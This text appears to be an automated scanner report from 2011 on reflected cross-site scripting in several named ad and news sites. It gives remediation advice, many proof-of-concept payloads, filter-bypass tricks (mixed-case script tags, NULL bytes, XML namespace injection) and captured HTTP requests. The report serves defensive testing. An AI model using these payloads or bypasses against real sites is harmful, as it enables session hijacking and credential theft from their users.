Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985d"-alert(1)-"bb754d1e1d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cafc2"-alert(1)-"32fb95a1715 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c50"-alert(1)-"5b17dd630f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62241"-alert(1)-"41856d58a51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aa89"-alert(1)-"2c267392a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be0e"-alert(1)-"eeace66c30c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c701"-alert(1)-"60f51ac54d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ad6"-alert(1)-"ce67ab6b923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5431"-alert(1)-"ecc4042015f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99290"-alert(1)-"21295270dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d892"-alert(1)-"2c2267ee8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a3d"-alert(1)-"387ea09717f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ecc"-alert(1)-"f59af658d37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c8e1"-alert(1)-"d188184ba9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ccb4"-alert(1)-"0a1eef0a385 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125aa"-alert(1)-"41b87e2863c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca3d"-alert(1)-"7d2af4878a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a006"-alert(1)-"331193e93c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb484"-alert(1)-"431fc0a02e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f43"-alert(1)-"db3b6157138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be31"-alert(1)-"ccced9a65eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6078"-alert(1)-"429fe3342d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec8f8"-alert(1)-"c68db13757c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 842ea"-alert(1)-"425ec9af40e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc73"-alert(1)-"5ad89bb03db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbe0"-alert(1)-"d8ecb12d6ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5879a"-alert(1)-"bb7dfa01818 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfd"-alert(1)-"b09ef200713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86b2"-alert(1)-"5d2c48ff9c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95327"-alert(1)-"3f30dcc58fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a8c"-alert(1)-"a34ffbae454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fac16"-alert(1)-"9688e994782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99357"-alert(1)-"4ee7bb08df1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5176c"-alert(1)-"bf7c2c63e04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the refcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43cc3"style%3d"x%3aexpression(alert(1))"00b4de691d2 was submitted in the refcat parameter. This input was echoed as 43cc3"style="x:expression(alert(1))"00b4de691d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the refcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb07'%3balert(1)//4d2d623eb2a was submitted in the refcat parameter. This input was echoed as 3fb07';alert(1)//4d2d623eb2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the auto_ctl_invite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2a9f'-alert(1)-'f17657d39c9 was submitted in the auto_ctl_invite parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16939'-alert(1)-'633f27d02c8 was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 07 Sep 2011 12:34:28 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b202.dl Set-Cookie: LP=1315398868; expires=Sun, 11 Sep 2011 16:34:28 GMT; path=/; domain=.questionmarket.com Content-Length: 2702 Content-Type: text/html
(function(){ var d=document,w=window,dle;
function ff(){ var p=w.parent,r;
while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { }
p = p.paren ...[SNIP]... t; if (!df.DL_already_ran){ dle=d.createElement('script'); dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=16939'-alert(1)-'633f27d02c8&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7'; ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78a38'-alert(1)-'cf5908a5123 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.40. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://amch.questionmarket.com
Path:
/adscgen/dynamiclink.js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5433'-alert(1)-'ded7162e703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fee25'-alert(1)-'65069f0c0a8 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the protocol request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d00ae'%3balert(1)//5eba82bd623 was submitted in the protocol parameter. This input was echoed as d00ae';alert(1)//5eba82bd623 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %005cfe5'-alert(1)-'0089328db21 was submitted in the site parameter. This input was echoed as 5cfe5'-alert(1)-'0089328db21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8cde5<script>alert(1)</script>0db736188ef was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload a5dcf<script>alert(1)</script>661bf37752d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 326f0<script>alert(1)</script>dc7df702c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ac888<a>8f8f392bd8e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=pixel&id=eb2039789ac888<a>8f8f392bd8e HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/RGA/iview/350415430/direct/01/6854533?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7b/3/0/%2a/b%3B245733871%3B0-0%3B0%3B46249204%3B3454-728/90%3B43845580/43863367/1%3B%3B%7Eokv%3D%3B%3Bpage%3DuberBannerAd%3Bmsrc%3DBOL_hpp_highlight_top%3B%3Bmc%3D0%3Btile%3D8%3Bsz%3D728x90%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 71e1a<a>9cf018d0a7 was submitted in the name parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the name request parameter is copied into the XML document as plain text between tags. The payload 17115<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>bf89301b6a1 was submitted in the name parameter. This input was echoed as 17115<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>bf89301b6a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the value request parameter is copied into the XML document as plain text between tags. The payload f1146<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ac628cc6951 was submitted in the value parameter. This input was echoed as f1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856 was submitted in the absolutePath parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1 Host: cc.wsj.net Proxy-Connection: keep-alive Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Restlet-Framework/2.0.3 Accept-Ranges: bytes Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept Content-Type: application/x-javascript P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC X-DEBUG-EMGSESSIONID: NULL Date: Wed, 07 Sep 2011 12:21:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 227453
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc HTTP/1.1 Host: cc.wsj.net Proxy-Connection: keep-alive Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Restlet-Framework/2.0.3 Accept-Ranges: bytes Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept Content-Type: application/x-javascript P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC X-DEBUG-EMGSESSIONID: NULL Date: Wed, 07 Sep 2011 12:21:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 227453
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 19297<script>alert(1)</script>711c5156631 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b8b'%3b0e868ba3cf5 was submitted in the REST URL parameter 2. This input was echoed as 44b8b';0e868ba3cf5 in the application's response.
